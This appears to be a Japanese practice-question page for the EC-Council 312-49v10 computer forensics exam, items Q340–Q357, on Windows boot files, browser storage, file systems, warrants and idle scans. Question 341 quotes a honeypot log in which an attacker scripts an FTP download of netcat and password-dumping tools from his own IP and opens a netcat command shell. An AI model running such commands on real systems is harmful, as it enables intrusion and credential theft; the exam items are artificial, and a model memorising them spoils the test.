模擬試験問題集[Q340-Q357]バンドルとEC-COUNCIL 312-49v10試験に合格する

12月 11, 202212月 11, 2022 試験問題模擬試験問題集[Q340-Q357]バンドルとEC-COUNCIL 312-49v10試験に合格する 0 コメント

この記事を評価する

EC-COUNCIL 312-49v10試験に合格するための模擬試験問題集をダウンロードする

2022有効な312-49v10試験解答＆EC-COUNCIL試験PDF

EC-COUNCIL 312-49v10 Exam Syllabus Topics：

トピック	詳細
トピック 1	データベース・フォレンジックネットワーク・フォレンジック Windowsフォレンジック
トピック 2	ハードディスクとファイルシステムを理解する電子メール犯罪の捜査
トピック3	コンピュータ・フォレンジック調査のプロセスダークウェブ・フォレンジックモバイル・フォレンジック
トピック4	データの取得と複製 LinuxとMacのフォレンジック

質問340
Windows XPのブート終了時に、ログオンダイアログボックスを初期化するために処理されるファイルは何ですか？

NTOSKRNL.EXE

NTLDR

LSASS.EXE

NTDETECT.COM

質問341
以下の抜粋は、lab.wiretrip.netでホストされていたハニーポットのログから抜粋したものです。Snort は、213.116.251.162 からの Unicode 攻撃を報告しました。ファイルパーミッションの正規化の脆弱性（UNICODE攻撃）により、通常はスクリプトを実行する権利を持っていない任意のフォルダでスクリプトが実行される可能性があります。攻撃者は Unicode 攻撃を試み、最終的に boot.ini の表示に成功する。
そして、msadcs.dllを経由してRDSで遊ぶことに切り替える。RDSの脆弱性により、悪意のあるユーザーはIISサーバー上でシェルコマンド（CMD.EXEなど）を実行するSQL文を構築することができる。攻撃者は、簡単なクエリを実行してディレクトリが存在することを発見し、msadcs.dllへのクエリで正しく機能していることを確認する。攻撃者はRDSクエリを実行し、以下のようなコマンドを実行します。
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
与えられた搾取から何が推測できますか？

攻撃者がユーザー名johna2kでログインするローカル・エクスプロイトです。

システムには2人の攻撃者、johna2kとhaxedj00がいる。

この攻撃はリモートから行われ、ハッカーは以下の3つのファイルをダウンロードします。

攻撃者はハイエンドのUDPポートを指定したため、シェルの生成に失敗した。

ログは、これが3つのファイルがダウンロードされたリモート攻撃であることを明確に示しているため、正解はCです。

質問342
Office文書（ワード、エクセル、パワーポイント）には、その文書を作成したマシンのMAC（一意の識別子）を追跡できるコードが含まれている。このコードは何と呼ばれているのだろうか？

マイクロソフト仮想マシン識別子

個人申請プロトコル

グローバル・ユニークID

個々のASCII文字列

質問343
ブラックベリーの電子メールはすべて、最終的にどのRIM独自のメカニズムを通じて送受信されるか？

ブラックベリーメッセージセンター

マイクロソフトエクスチェンジ

ブラックベリーWAPゲートウェイ

ブラックベリーWEPゲートウェイ

質問344
Windowsベースのサーバーで実行されているすべてのネットワークサービスを表示するコマンドはどれですか？

ネットスタート

ネットセッション

ネット使用

ネットコンフィグ

質問345
調査担当者が仮想マシンのインスタンスを取得し、フォレンジック調査プロセスを開始できるクラウドモデルはどれですか？

PaaSモデル

IaaSモデル

SaaSモデル

SecaaSモデル

質問346
アイドリング状態」とは？

インターネットに接続されていないPC

ゾンビ

使用していないPC

ボット

質問347
履歴、キャッシュ、クッキーを含む閲覧記録を保存するために、ESE（Extensible Storage Engine）データベース形式を使用しているウェブブラウザは次のうちどれですか？

サファリ

モジラ・ファイアフォックス

マイクロソフト・エッジ

グーグル・クローム

質問348
ファイルアロケーションテーブルの最初の予約セクタの名前は？

ボリューム・ブート・レコード

パーティションブートセクター

マスターブートレコード

BIOSパラメータブロック

質問349
令状を取得する際に重要なこと：

捜索される場所と押収される物品を特に記述すること。

捜索される場所と押収される物品の詳細を記載すること。

一般的に、捜索される場所と押収される品目について説明すること。

捜索される場所を特に記載し、押収される物品を一般的に記載すること。

質問350
なぜLinux/Unixベースのコンピュータの方がWindowsコンピュータよりもアイドルスキャンに適しているのですか？

Linux/Unixコンピュータは侵害されやすい

Linux/Unixコンピュータは常に会話している

ウィンドウズ・コンピューターは常に会話している

Windowsコンピュータがアイドルスキャンに反応しない

質問351
論理ファイルシステムのエラーを修復するのに役立つWindowsユーティリティはどれですか？

リソースモニター

ディスクのクリーンアップ

ディスクデフラグ

チェックディスク

質問352
Linuxのブートプロセスで、システムのハードウェアを初期化するステージはどれか？

BIOSステージ

ブートローダー・ステージ

ブートROMステージ

カーネルステージ

質問353
パスワードキーパーはどのような暗号化技術を使用していますか。

スリーディーエス

AES

フグ

RC5

質問354
サイリーはフロリダ州のある組織で発生したネットワーク侵入事件を調査している。彼女は、侵入者がIPパケットでファイアウォールに負荷をかけることで、会社のファイアウォールにアクセスできたことを発見する。サイリーは調査を通じて、侵入者が会社の電話システムにハッキングし、PBXシステムのハードディスクを使って共有音楽ファイルを保存していることを突き止めた。会社のPBXシステムに対するこの攻撃は何と呼ばれるでしょうか？

フレーキング

スクワット

クランチング

口実

質問355
次のディレクトリには何が保存されていますか？HKLMSECURITYPolicySecrets

過去20ユーザー分のパスワード・ハッシュのキャッシュ

サービスアカウントのパスワードを平文で

IASアカウント名とパスワード

ローカル・ストア PKI Kerberos 証明書

質問356
攻撃者のコンピューターがIDLEスキャンで開いているポートのゾンビ・コンピューターにIPID 31400を送信した場合、どのような反応が返ってくるでしょうか？

ゾンビは応答を送信しない

31402

31399

31401

質問357
クリスはあるクライアントから報告されたハッキング事件の調査を依頼された。同社は、この攻撃に内部の共犯者が関与していると疑っている。インシデント現場に到着すると、クリスは物理的なエリアを確保し、目視で現場を記録する。ケーブルを外す前に、すべてのケーブルとコネクタにラベルを貼る。次の一連の出来事は何だと思いますか？

ターゲット・メディアを接続し、取得のためにシステムを準備し、証拠を確保し、メディアをコピーする。

取得のためにシステムを準備する；ターゲット・メディアを接続する；メディアをコピーする；証拠を保護する

対象メディアを接続する；取得のためにシステムを準備する；証拠を確保する；メディアをコピーする

証拠を確保する；取得のためにシステムを準備する；対象メディアを接続する；メディアをコピーする

ローディング …